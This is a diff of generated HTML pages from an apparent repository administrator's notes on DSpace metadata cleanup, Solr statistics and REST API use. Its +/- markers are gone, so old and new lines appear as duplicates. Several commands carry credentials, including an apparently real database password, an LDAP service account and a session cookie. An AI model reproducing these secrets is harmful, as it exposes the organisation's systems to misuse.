$ http &#39;https://cgspace.cgiar.org/open-search/discover?scope=10568%2F34494&amp;query=trade+off&amp;rpp=100&amp;start=200&#39; User-Agent:&#39;curl&#39; &gt; /tmp/wle-trade-off-page3.xml
</code></pre><ul>
<li>Ugh, and to extract the <code>&lt;id&gt;</code> from each <code>&lt;entry&gt;</code> we have to use an XPath query, but use a <a href="http://blog.powered-up-games.com/wordpress/archives/70">hack to ignore the default namespace by setting each element&rsquo;s local name</a>:</li>
</ul>
<pre tabindex="0"><code>$ xmllint --xpath '//*[local-name()=&quot;entry&quot;]/*[local-name()=&quot;id&quot;]/text()' /tmp/wle-trade-off-page1.xml &gt;&gt; /tmp/ids.txt
$ xmllint --xpath '//*[local-name()=&quot;entry&quot;]/*[local-name()=&quot;id&quot;]/text()' /tmp/wle-trade-off-page2.xml &gt;&gt; /tmp/ids.txt
$ xmllint --xpath '//*[local-name()=&quot;entry&quot;]/*[local-name()=&quot;id&quot;]/text()' /tmp/wle-trade-off-page3.xml &gt;&gt; /tmp/ids.txt
<pre tabindex="0"><code>$ xmllint --xpath &#39;//*[local-name()=&#34;entry&#34;]/*[local-name()=&#34;id&#34;]/text()&#39; /tmp/wle-trade-off-page1.xml &gt;&gt; /tmp/ids.txt
$ xmllint --xpath &#39;//*[local-name()=&#34;entry&#34;]/*[local-name()=&#34;id&#34;]/text()&#39; /tmp/wle-trade-off-page2.xml &gt;&gt; /tmp/ids.txt
$ xmllint --xpath &#39;//*[local-name()=&#34;entry&#34;]/*[local-name()=&#34;id&#34;]/text()&#39; /tmp/wle-trade-off-page3.xml &gt;&gt; /tmp/ids.txt
$ sort -u /tmp/ids.txt &gt; /tmp/ids-sorted.txt
$ grep -oE '[0-9]+/[0-9]+' /tmp/ids.txt &gt; /tmp/handles.txt
$ grep -oE &#39;[0-9]+/[0-9]+&#39; /tmp/ids.txt &gt; /tmp/handles.txt
</code></pre><ul>
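<li>An alternative that handles the default namespace properly is xmlstarlet (a sketch, assuming the feed uses the Atom namespace):</li>
</ul>
<pre tabindex="0"><code>$ xmlstarlet sel -N a=&#34;http://www.w3.org/2005/Atom&#34; -t -v &#39;//a:entry/a:id&#39; -n /tmp/wle-trade-off-page1.xml &gt;&gt; /tmp/ids.txt
</code></pre><ul>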
<li>Now I have all the handles for the matching items and I can use the REST API to get each item&rsquo;s PDFs&hellip;
<ul>

View File

@ -48,7 +48,7 @@ I filed a bug on OpenRXV: https://github.com/ilri/OpenRXV/issues/39
I filed an issue on OpenRXV to make some minor edits to the admin UI: https://github.com/ilri/OpenRXV/issues/40
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -173,7 +173,7 @@ $ grep -c added /tmp/2020-09-02-countrycodetagger.log
</code></pre><ul>
<li>I tried to query LDAP directly using the application credentials with ldapsearch and it works:</li>
</ul>
<pre tabindex="0"><code>$ ldapsearch -x -H ldaps://AZCGNEROOT2.CGIARAD.ORG:636/ -b &quot;dc=cgiarad,dc=org&quot; -D &quot;applicationaccount@cgiarad.org&quot; -W &quot;(sAMAccountName=me)&quot;
<pre tabindex="0"><code>$ ldapsearch -x -H ldaps://AZCGNEROOT2.CGIARAD.ORG:636/ -b &#34;dc=cgiarad,dc=org&#34; -D &#34;applicationaccount@cgiarad.org&#34; -W &#34;(sAMAccountName=me)&#34;
</code></pre><ul>
<li>According to the <a href="https://wiki.lyrasis.org/display/DSDOC6x/Authentication+Plugins#AuthenticationPlugins-LDAPAuthentication">DSpace 6 docs</a> we need to escape commas in our LDAP parameters due to the new configuration system
<ul>
@ -206,8 +206,8 @@ Report
Formally Published
Poster
Unrefereed reprint
$ ./delete-metadata-values.py -i 2020-09-03-delete-review-status.csv -db dspace -u dspace -p 'fuuu' -f dc.description.version -m 68
$ ./fix-metadata-values.py -i 2020-09-03-fix-review-status.csv -db dspace -u dspace -p 'fuuu' -f dc.description.version -t 'correct' -m 68
$ ./delete-metadata-values.py -i 2020-09-03-delete-review-status.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.description.version -m 68
$ ./fix-metadata-values.py -i 2020-09-03-fix-review-status.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.description.version -t &#39;correct&#39; -m 68
</code></pre><ul>
<li>Start reviewing 95 items for IITA (20201stbatch)
<ul>
@ -259,9 +259,9 @@ java.lang.NullPointerException
</li>
<li>I will update our nearly 6,000 metadata values for CIFOR in the database accordingly:</li>
</ul>
<pre tabindex="0"><code>dspace=# UPDATE metadatavalue SET text_value = regexp_replace(text_value, '^(http://)?www\.cifor\.org/(nc/)?online-library/browse/view-publication/publication/([[:digit:]]+)\.html$', 'https://www.cifor.org/knowledge/publication/\3') WHERE metadata_field_id=219 AND text_value ~ 'www\.cifor\.org/(nc/)?online-library/browse/view-publication/publication/[[:digit:]]+';
dspace=# UPDATE metadatavalue SET text_value = regexp_replace(text_value, '^https?://www\.cifor\.org/library/([[:digit:]]+)/?$', 'https://www.cifor.org/knowledge/publication/\1') WHERE metadata_field_id=219 AND text_value ~ 'https?://www\.cifor\.org/library/[[:digit:]]+/?';
dspace=# UPDATE metadatavalue SET text_value = regexp_replace(text_value, '^https?://www\.cifor\.org/pid/([[:digit:]]+)/?$', 'https://www.cifor.org/knowledge/publication/\1') WHERE metadata_field_id=219 AND text_value ~ 'https?://www\.cifor\.org/pid/[[:digit:]]+';
<pre tabindex="0"><code>dspace=# UPDATE metadatavalue SET text_value = regexp_replace(text_value, &#39;^(http://)?www\.cifor\.org/(nc/)?online-library/browse/view-publication/publication/([[:digit:]]+)\.html$&#39;, &#39;https://www.cifor.org/knowledge/publication/\3&#39;) WHERE metadata_field_id=219 AND text_value ~ &#39;www\.cifor\.org/(nc/)?online-library/browse/view-publication/publication/[[:digit:]]+&#39;;
dspace=# UPDATE metadatavalue SET text_value = regexp_replace(text_value, &#39;^https?://www\.cifor\.org/library/([[:digit:]]+)/?$&#39;, &#39;https://www.cifor.org/knowledge/publication/\1&#39;) WHERE metadata_field_id=219 AND text_value ~ &#39;https?://www\.cifor\.org/library/[[:digit:]]+/?&#39;;
dspace=# UPDATE metadatavalue SET text_value = regexp_replace(text_value, &#39;^https?://www\.cifor\.org/pid/([[:digit:]]+)/?$&#39;, &#39;https://www.cifor.org/knowledge/publication/\1&#39;) WHERE metadata_field_id=219 AND text_value ~ &#39;https?://www\.cifor\.org/pid/[[:digit:]]+&#39;;
</code></pre><ul>
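<li>Bulk rewrites like this are safer when previewed with a SELECT using the same pattern first, for example:</li>
</ul>
<pre tabindex="0"><code>dspace=# SELECT text_value, regexp_replace(text_value, &#39;^https?://www\.cifor\.org/library/([[:digit:]]+)/?$&#39;, &#39;https://www.cifor.org/knowledge/publication/\1&#39;) FROM metadatavalue WHERE metadata_field_id=219 AND text_value ~ &#39;https?://www\.cifor\.org/library/[[:digit:]]+/?&#39; LIMIT 10;
</code></pre><ul>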
<li>I did some cleanup on the author affiliations of the IITA data against our 2019-04 list using reconcile-csv and OpenRefine:
<ul>
@ -328,7 +328,7 @@ AFRICA SOUTH OF SAHARA,SUB-SAHARAN AFRICA
NORTH AFRICA,NORTHERN AFRICA
WEST ASIA,WESTERN ASIA
SOUTHWEST ASIA,SOUTHWESTERN ASIA
$ ./fix-metadata-values.py -i 2020-09-10-fix-cgspace-regions.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.region -t 'correct' -m 227 -d -n
$ ./fix-metadata-values.py -i 2020-09-10-fix-cgspace-regions.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.coverage.region -t &#39;correct&#39; -m 227 -d -n
Connected to database.
Would fix 12227 occurences of: EAST AFRICA
Would fix 7996 occurences of: WEST AFRICA
@ -417,7 +417,7 @@ Would fix 3 occurences of: SOUTHWEST ASIA
</ul>
</li>
</ul>
<pre tabindex="0"><code>value + &quot;__description:&quot; + cells[&quot;dc.type&quot;].value
<pre tabindex="0"><code>value + &#34;__description:&#34; + cells[&#34;dc.type&#34;].value
</code></pre><ul>
<li>Then I created a SAF bundle with SAFBuilder:</li>
</ul>
@ -477,9 +477,9 @@ Would fix 3 occurences of: SOUTHWEST ASIA
</ul>
<pre tabindex="0"><code>$ cat 2020-09-17-add-bioversity-orcids.csv
dc.contributor.author,cg.creator.id
&quot;Etten, Jacob van&quot;,&quot;Jacob van Etten: 0000-0001-7554-2558&quot;
&quot;van Etten, Jacob&quot;,&quot;Jacob van Etten: 0000-0001-7554-2558&quot;
$ ./add-orcid-identifiers-csv.py -i 2020-09-17-add-bioversity-orcids.csv -db dspace -u dspace -p 'dom@in34sniper'
&#34;Etten, Jacob van&#34;,&#34;Jacob van Etten: 0000-0001-7554-2558&#34;
&#34;van Etten, Jacob&#34;,&#34;Jacob van Etten: 0000-0001-7554-2558&#34;
$ ./add-orcid-identifiers-csv.py -i 2020-09-17-add-bioversity-orcids.csv -db dspace -u dspace -p &#39;dom@in34sniper&#39;
</code></pre><ul>
<li>I sent a follow-up message to Atmire to look into the two remaining issues with the DSpace 6 upgrade
<ul>
@ -496,7 +496,7 @@ $ ./add-orcid-identifiers-csv.py -i 2020-09-17-add-bioversity-orcids.csv -db dsp
</ul>
</li>
</ul>
<pre tabindex="0"><code>https://cgspace.cgiar.org/open-search/discover?query=type:&quot;Journal Article&quot; AND status:&quot;Open Access&quot; AND crpsubject:&quot;Water, Land and Ecosystems&quot; AND &quot;tradeoffs&quot;&amp;rpp=100
<pre tabindex="0"><code>https://cgspace.cgiar.org/open-search/discover?query=type:&#34;Journal Article&#34; AND status:&#34;Open Access&#34; AND crpsubject:&#34;Water, Land and Ecosystems&#34; AND &#34;tradeoffs&#34;&amp;rpp=100
</code></pre><ul>
<li>I noticed that my <code>move-collections.sh</code> script didn&rsquo;t work on DSpace 6 because of the change from IDs to UUIDs, so I modified it to quote the collection <code>resource_id</code> parameters in the PostgreSQL query</li>
</ul>
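<ul>
<li>The gist of that fix, an illustrative sketch (UUIDs must be quoted where the old integer IDs were not):</li>
</ul>
<pre tabindex="0"><code>dspace=# SELECT * FROM collection2item WHERE collection_id=&#39;5471c3aa-202e-42f0-96c2-497a18e3b708&#39;;
</code></pre>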
@ -538,7 +538,7 @@ dspacestatistics=# SELECT SUM(downloads) FROM items;
</ul>
<pre tabindex="0"><code>dspace=# BEGIN;
BEGIN
dspace=# DELETE FROM metadatavalue WHERE text_value='Report' AND resource_type_id=2 AND metadata_field_id=68;
dspace=# DELETE FROM metadatavalue WHERE text_value=&#39;Report&#39; AND resource_type_id=2 AND metadata_field_id=68;
DELETE 12
dspace=# COMMIT;
</code></pre><ul>
@ -573,23 +573,23 @@ dspace=# COMMIT;
</li>
</ul>
<pre tabindex="0"><code>...
item_ids = ['0079470a-87a1-4373-beb1-b16e3f0c4d81', '007a9df1-0871-4612-8b28-5335982198cb']
item_ids_str = ' OR '.join(item_ids).replace('-', '\-')
item_ids = [&#39;0079470a-87a1-4373-beb1-b16e3f0c4d81&#39;, &#39;007a9df1-0871-4612-8b28-5335982198cb&#39;]
item_ids_str = &#39; OR &#39;.join(item_ids).replace(&#39;-&#39;, &#39;\-&#39;)
...
solr_query_params = {
&quot;q&quot;: f&quot;id:({item_ids_str})&quot;,
&quot;fq&quot;: &quot;type:2 AND isBot:false AND statistics_type:view AND time:[2020-01-01T00:00:00Z TO 2020-09-02T00:00:00Z]&quot;,
&quot;facet&quot;: &quot;true&quot;,
&quot;facet.field&quot;: &quot;id&quot;,
&quot;facet.mincount&quot;: 1,
&quot;facet.limit&quot;: 1,
&quot;facet.offset&quot;: 0,
&quot;stats&quot;: &quot;true&quot;,
&quot;stats.field&quot;: &quot;id&quot;,
&quot;stats.calcdistinct&quot;: &quot;true&quot;,
&quot;shards&quot;: shards,
&quot;rows&quot;: 0,
&quot;wt&quot;: &quot;json&quot;,
&#34;q&#34;: f&#34;id:({item_ids_str})&#34;,
&#34;fq&#34;: &#34;type:2 AND isBot:false AND statistics_type:view AND time:[2020-01-01T00:00:00Z TO 2020-09-02T00:00:00Z]&#34;,
&#34;facet&#34;: &#34;true&#34;,
&#34;facet.field&#34;: &#34;id&#34;,
&#34;facet.mincount&#34;: 1,
&#34;facet.limit&#34;: 1,
&#34;facet.offset&#34;: 0,
&#34;stats&#34;: &#34;true&#34;,
&#34;stats.field&#34;: &#34;id&#34;,
&#34;stats.calcdistinct&#34;: &#34;true&#34;,
&#34;shards&#34;: shards,
&#34;rows&#34;: 0,
&#34;wt&#34;: &#34;json&#34;,
}
</code></pre><ul>
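<li>Those params then go straight into a GET against the Solr core, roughly (a sketch; <code>solr_url</code> is illustrative):</li>
</ul>
<pre tabindex="0"><code>res = requests.get(f&#39;{solr_url}/statistics/select&#39;, params=solr_query_params)
views = res.json()[&#39;stats&#39;][&#39;stats_fields&#39;][&#39;id&#39;][&#39;countDistinct&#39;]
</code></pre><ul>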
<li>The date range format for Solr is important, but it seems we only need to add <code>T00:00:00Z</code> to the normal ISO 8601 YYYY-MM-DD strings</li>
@ -600,61 +600,61 @@ solr_query_params = {
</ul>
<pre tabindex="0"><code>$ curl -s -d @request.json https://dspacetest.cgiar.org/rest/statistics/items | json_pp
{
&quot;currentPage&quot; : 0,
&quot;limit&quot; : 10,
&quot;statistics&quot; : [
&#34;currentPage&#34; : 0,
&#34;limit&#34; : 10,
&#34;statistics&#34; : [
{
&quot;downloads&quot; : 3329,
&quot;id&quot; : &quot;b2c1bbfd-65b0-438c-9e49-d271c49b2696&quot;,
&quot;views&quot; : 1565
&#34;downloads&#34; : 3329,
&#34;id&#34; : &#34;b2c1bbfd-65b0-438c-9e49-d271c49b2696&#34;,
&#34;views&#34; : 1565
},
{
&quot;downloads&quot; : 3797,
&quot;id&quot; : &quot;f44cf173-2344-4eb2-8f00-ee55df32c76f&quot;,
&quot;views&quot; : 48
&#34;downloads&#34; : 3797,
&#34;id&#34; : &#34;f44cf173-2344-4eb2-8f00-ee55df32c76f&#34;,
&#34;views&#34; : 48
},
{
&quot;downloads&quot; : 11064,
&quot;id&quot; : &quot;8542f9da-9ce1-4614-abf4-f2e3fdb4b305&quot;,
&quot;views&quot; : 26
&#34;downloads&#34; : 11064,
&#34;id&#34; : &#34;8542f9da-9ce1-4614-abf4-f2e3fdb4b305&#34;,
&#34;views&#34; : 26
},
{
&quot;downloads&quot; : 6782,
&quot;id&quot; : &quot;2324aa41-e9de-4a2b-bc36-16241464683e&quot;,
&quot;views&quot; : 19
&#34;downloads&#34; : 6782,
&#34;id&#34; : &#34;2324aa41-e9de-4a2b-bc36-16241464683e&#34;,
&#34;views&#34; : 19
},
{
&quot;downloads&quot; : 48,
&quot;id&quot; : &quot;0fe573e7-042a-4240-a4d9-753b61233908&quot;,
&quot;views&quot; : 12
&#34;downloads&#34; : 48,
&#34;id&#34; : &#34;0fe573e7-042a-4240-a4d9-753b61233908&#34;,
&#34;views&#34; : 12
},
{
&quot;downloads&quot; : 0,
&quot;id&quot; : &quot;000e61ca-695d-43e5-9ab8-1f3fd7a67a32&quot;,
&quot;views&quot; : 4
&#34;downloads&#34; : 0,
&#34;id&#34; : &#34;000e61ca-695d-43e5-9ab8-1f3fd7a67a32&#34;,
&#34;views&#34; : 4
},
{
&quot;downloads&quot; : 0,
&quot;id&quot; : &quot;000dc7cd-9485-424b-8ecf-78002613cc87&quot;,
&quot;views&quot; : 1
&#34;downloads&#34; : 0,
&#34;id&#34; : &#34;000dc7cd-9485-424b-8ecf-78002613cc87&#34;,
&#34;views&#34; : 1
},
{
&quot;downloads&quot; : 0,
&quot;id&quot; : &quot;000e1616-3901-4431-80b1-c6bc67312d8c&quot;,
&quot;views&quot; : 1
&#34;downloads&#34; : 0,
&#34;id&#34; : &#34;000e1616-3901-4431-80b1-c6bc67312d8c&#34;,
&#34;views&#34; : 1
},
{
&quot;downloads&quot; : 0,
&quot;id&quot; : &quot;000ea897-5557-49c7-9f54-9fa192c0f83b&quot;,
&quot;views&quot; : 1
&#34;downloads&#34; : 0,
&#34;id&#34; : &#34;000ea897-5557-49c7-9f54-9fa192c0f83b&#34;,
&#34;views&#34; : 1
},
{
&quot;downloads&quot; : 0,
&quot;id&quot; : &quot;000ec427-97e5-4766-85a5-e8dd62199ab5&quot;,
&quot;views&quot; : 1
&#34;downloads&#34; : 0,
&#34;id&#34; : &#34;000ec427-97e5-4766-85a5-e8dd62199ab5&#34;,
&#34;views&#34; : 1
}
],
&quot;totalPages&quot; : 13
&#34;totalPages&#34; : 13
}
</code></pre><ul>
<li>I deployed it on DSpace Test and sent a note to Salem so he can test it</li>

View File

@ -44,7 +44,7 @@ During the FlywayDB migration I got an error:
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -144,10 +144,10 @@ During the FlywayDB migration I got an error:
</ul>
</li>
</ul>
<pre tabindex="0"><code>2020-10-06 21:36:04,138 ERROR org.hibernate.engine.jdbc.spi.SqlExceptionHelper @ Batch entry 0 update public.bitstreamformatregistry set description='Electronic publishing', internal='FALSE', mimetype='application/epub+zip', short_description='EPUB', support_level=1 where bitstream_format_id=78 was aborted: ERROR: duplicate key value violates unique constraint &quot;bitstreamformatregistry_short_description_key&quot;
<pre tabindex="0"><code>2020-10-06 21:36:04,138 ERROR org.hibernate.engine.jdbc.spi.SqlExceptionHelper @ Batch entry 0 update public.bitstreamformatregistry set description=&#39;Electronic publishing&#39;, internal=&#39;FALSE&#39;, mimetype=&#39;application/epub+zip&#39;, short_description=&#39;EPUB&#39;, support_level=1 where bitstream_format_id=78 was aborted: ERROR: duplicate key value violates unique constraint &#34;bitstreamformatregistry_short_description_key&#34;
Detail: Key (short_description)=(EPUB) already exists. Call getNextException to see other errors in the batch.
2020-10-06 21:36:04,138 WARN org.hibernate.engine.jdbc.spi.SqlExceptionHelper @ SQL Error: 0, SQLState: 23505
2020-10-06 21:36:04,138 ERROR org.hibernate.engine.jdbc.spi.SqlExceptionHelper @ ERROR: duplicate key value violates unique constraint &quot;bitstreamformatregistry_short_description_key&quot;
2020-10-06 21:36:04,138 ERROR org.hibernate.engine.jdbc.spi.SqlExceptionHelper @ ERROR: duplicate key value violates unique constraint &#34;bitstreamformatregistry_short_description_key&#34;
Detail: Key (short_description)=(EPUB) already exists.
2020-10-06 21:36:04,142 ERROR org.hibernate.engine.jdbc.batch.internal.BatchingBatch @ HHH000315: Exception executing batch [could not execute batch]
2020-10-06 21:36:04,143 ERROR org.dspace.storage.rdbms.DatabaseRegistryUpdater @ Error attempting to update Bitstream Format and/or Metadata Registries
@ -233,7 +233,7 @@ New item: aff5e78d-87c9-438d-94f8-1050b649961c (10568/108548)
+ Added (dc.title): Testing CUA import NPE
Tue Oct 06 22:06:14 CEST 2020 | Query:containerItem:aff5e78d-87c9-438d-94f8-1050b649961c
Error while updating
org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Expected mime type application/octet-stream but got text/html. &lt;!doctype html&gt;&lt;html lang=&quot;en&quot;&gt;&lt;head&gt;&lt;title&gt;HTTP Status 404 Not Found&lt;/title&gt;&lt;style type=&quot;text/css&quot;&gt;body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;HTTP Status 404 Not Found&lt;/h1&gt;&lt;hr class=&quot;line&quot; /&gt;&lt;p&gt;&lt;b&gt;Type&lt;/b&gt; Status Report&lt;/p&gt;&lt;p&gt;&lt;b&gt;Message&lt;/b&gt; The requested resource [/solr/update] is not available&lt;/p&gt;&lt;p&gt;&lt;b&gt;Description&lt;/b&gt; The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.&lt;/p&gt;&lt;hr class=&quot;line&quot; /&gt;&lt;h3&gt;Apache Tomcat/7.0.104&lt;/h3&gt;&lt;/body&gt;&lt;/html&gt;
org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Expected mime type application/octet-stream but got text/html. &lt;!doctype html&gt;&lt;html lang=&#34;en&#34;&gt;&lt;head&gt;&lt;title&gt;HTTP Status 404 Not Found&lt;/title&gt;&lt;style type=&#34;text/css&#34;&gt;body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;HTTP Status 404 Not Found&lt;/h1&gt;&lt;hr class=&#34;line&#34; /&gt;&lt;p&gt;&lt;b&gt;Type&lt;/b&gt; Status Report&lt;/p&gt;&lt;p&gt;&lt;b&gt;Message&lt;/b&gt; The requested resource [/solr/update] is not available&lt;/p&gt;&lt;p&gt;&lt;b&gt;Description&lt;/b&gt; The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.&lt;/p&gt;&lt;hr class=&#34;line&#34; /&gt;&lt;h3&gt;Apache Tomcat/7.0.104&lt;/h3&gt;&lt;/body&gt;&lt;/html&gt;
at org.apache.solr.client.solrj.impl.HttpSolrServer.executeMethod(HttpSolrServer.java:512)
at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:210)
at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:206)
@ -278,7 +278,7 @@ org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Expected m
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ http -f POST https://dspacetest.cgiar.org/rest/login email=aorth@fuuu.com 'password=fuuuu'
<pre tabindex="0"><code>$ http -f POST https://dspacetest.cgiar.org/rest/login email=aorth@fuuu.com &#39;password=fuuuu&#39;
$ http https://dspacetest.cgiar.org/rest/status Cookie:JSESSIONID=EABAC9EFF942028AA52DFDA16DBCAFDE
</code></pre><ul>
<li>Then we post an item in JSON format to <code>/rest/collections/{uuid}/items</code>:</li>
@ -287,25 +287,25 @@ $ http https://dspacetest.cgiar.org/rest/status Cookie:JSESSIONID=EABAC9EFF94202
</code></pre><ul>
<li>Format of JSON is:</li>
</ul>
<pre tabindex="0"><code>{ &quot;metadata&quot;: [
<pre tabindex="0"><code>{ &#34;metadata&#34;: [
{
&quot;key&quot;: &quot;dc.title&quot;,
&quot;value&quot;: &quot;Testing REST API post&quot;,
&quot;language&quot;: &quot;en_US&quot;
&#34;key&#34;: &#34;dc.title&#34;,
&#34;value&#34;: &#34;Testing REST API post&#34;,
&#34;language&#34;: &#34;en_US&#34;
},
{
&quot;key&quot;: &quot;dc.contributor.author&quot;,
&quot;value&quot;: &quot;Orth, Alan&quot;,
&quot;language&quot;: &quot;en_US&quot;
&#34;key&#34;: &#34;dc.contributor.author&#34;,
&#34;value&#34;: &#34;Orth, Alan&#34;,
&#34;language&#34;: &#34;en_US&#34;
},
{
&quot;key&quot;: &quot;dc.date.issued&quot;,
&quot;value&quot;: &quot;2020-09-01&quot;,
&quot;language&quot;: &quot;en_US&quot;
&#34;key&#34;: &#34;dc.date.issued&#34;,
&#34;value&#34;: &#34;2020-09-01&#34;,
&#34;language&#34;: &#34;en_US&#34;
}
],
&quot;archived&quot;:&quot;false&quot;,
&quot;withdrawn&quot;:&quot;false&quot;
&#34;archived&#34;:&#34;false&#34;,
&#34;withdrawn&#34;:&#34;false&#34;
}
</code></pre><ul>
<li>What is unclear to me is the <code>archived</code> parameter; it seems to do nothing&hellip; perhaps it is only used for the <code>/items</code> endpoint when printing information about an item
@ -362,7 +362,7 @@ $ http https://dspacetest.cgiar.org/rest/status Cookie:JSESSIONID=EABAC9EFF94202
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ http POST http://localhost:8080/rest/login email=aorth@fuuu.com 'password=ddddd'
<pre tabindex="0"><code>$ http POST http://localhost:8080/rest/login email=aorth@fuuu.com &#39;password=ddddd&#39;
$ http http://localhost:8080/rest/status rest-dspace-token:d846f138-75d3-47ba-9180-b88789a28099
$ http POST http://localhost:8080/rest/collections/1549/items rest-dspace-token:d846f138-75d3-47ba-9180-b88789a28099 &lt; item-object.json
</code></pre><ul>
@ -408,10 +408,10 @@ $ http POST http://localhost:8080/rest/collections/1549/items rest-dspace-token:
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ http --print Hh https://dspacetest.cgiar.org/rest/bitstreams/dfa1d9c3-75d3-4380-a9d3-4c8cbbed2d21/retrieve User-Agent:&quot;RTB website BOT&quot;
$ http --print Hh https://dspacetest.cgiar.org/rest/bitstreams/dfa1d9c3-75d3-4380-a9d3-4c8cbbed2d21/retrieve User-Agent:&quot;RTB website BOT&quot;
$ http --print Hh https://dspacetest.cgiar.org/rest/bitstreams/dfa1d9c3-75d3-4380-a9d3-4c8cbbed2d21/retrieve User-Agent:&quot;RTB website BOT&quot;
$ http --print Hh https://dspacetest.cgiar.org/rest/bitstreams/dfa1d9c3-75d3-4380-a9d3-4c8cbbed2d21/retrieve User-Agent:&quot;RTB website BOT&quot;
<pre tabindex="0"><code>$ http --print Hh https://dspacetest.cgiar.org/rest/bitstreams/dfa1d9c3-75d3-4380-a9d3-4c8cbbed2d21/retrieve User-Agent:&#34;RTB website BOT&#34;
$ http --print Hh https://dspacetest.cgiar.org/rest/bitstreams/dfa1d9c3-75d3-4380-a9d3-4c8cbbed2d21/retrieve User-Agent:&#34;RTB website BOT&#34;
$ http --print Hh https://dspacetest.cgiar.org/rest/bitstreams/dfa1d9c3-75d3-4380-a9d3-4c8cbbed2d21/retrieve User-Agent:&#34;RTB website BOT&#34;
$ http --print Hh https://dspacetest.cgiar.org/rest/bitstreams/dfa1d9c3-75d3-4380-a9d3-4c8cbbed2d21/retrieve User-Agent:&#34;RTB website BOT&#34;
</code></pre><ul>
<li>After a few minutes I saw these four hits in Solr&hellip; WTF
<ul>
@ -483,7 +483,7 @@ dspace=&gt; COMMIT;
</ul>
</li>
</ul>
<pre tabindex="0"><code>dspace=&gt; \COPY (SELECT DISTINCT(text_value) as &quot;cg.coverage.country&quot; FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=228) TO /tmp/2020-10-13-countries.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=&gt; \COPY (SELECT DISTINCT(text_value) as &#34;cg.coverage.country&#34; FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=228) TO /tmp/2020-10-13-countries.csv WITH CSV HEADER;
COPY 195
</code></pre><ul>
<li>Then, in OpenRefine, make a new column for corrections and use this GREL to convert to title case: <code>value.toTitlecase()</code>
@ -493,7 +493,7 @@ COPY 195
</li>
<li>For the input forms I found out how to do a complicated search and replace in vim:</li>
</ul>
<pre tabindex="0"><code>:'&lt;,'&gt;s/\&lt;\(pair\|displayed\|stored\|value\|AND\)\@!\(\w\)\(\w*\|\)\&gt;/\u\2\L\3/g
<pre tabindex="0"><code>:&#39;&lt;,&#39;&gt;s/\&lt;\(pair\|displayed\|stored\|value\|AND\)\@!\(\w\)\(\w*\|\)\&gt;/\u\2\L\3/g
</code></pre><ul>
<li>It uses a <a href="https://jbodah.github.io/blog/2016/11/01/positivenegative-lookaheadlookbehind-vim/">negative lookahead</a> (aka &ldquo;lookaround&rdquo; in PCRE?) to match words that are <em>not</em> &ldquo;pair&rdquo;, &ldquo;displayed&rdquo;, etc because we don&rsquo;t want to edit the XML tags themselves&hellip;
<ul>
@ -509,14 +509,14 @@ COPY 195
</ul>
</li>
</ul>
<pre tabindex="0"><code>dspace=&gt; \COPY (SELECT DISTINCT(text_value) as &quot;cg.coverage.region&quot; FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=227) TO /tmp/2020-10-14-regions.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=&gt; \COPY (SELECT DISTINCT(text_value) as &#34;cg.coverage.region&#34; FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=227) TO /tmp/2020-10-14-regions.csv WITH CSV HEADER;
COPY 34
</code></pre><ul>
<li>I did the same as with the countries: OpenRefine for the database values and vim for the input forms</li>
<li>After testing the replacements locally I ran them on CGSpace:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2020-10-13-CGSpace-countries.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.country -t 'correct' -m 228
$ ./fix-metadata-values.py -i /tmp/2020-10-14-CGSpace-regions.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.region -t 'correct' -m 227
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2020-10-13-CGSpace-countries.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.coverage.country -t &#39;correct&#39; -m 228
$ ./fix-metadata-values.py -i /tmp/2020-10-14-CGSpace-regions.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.coverage.region -t &#39;correct&#39; -m 227
</code></pre><ul>
<li>Then I started a full re-indexing:</li>
</ul>
@ -583,14 +583,14 @@ sys 2m22.713s
dspace=&gt; UPDATE metadatavalue SET text_value=LOWER(text_value) WHERE resource_type_id=2 AND metadata_field_id=57;
UPDATE 335063
dspace=&gt; COMMIT;
dspace=&gt; \COPY (SELECT DISTINCT text_value as &quot;dc.subject&quot;, count(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=57 GROUP BY &quot;dc.subject&quot; ORDER BY count DESC LIMIT 1500) TO /tmp/2020-10-15-top-1500-agrovoc-subject.csv WITH CSV HEADER;
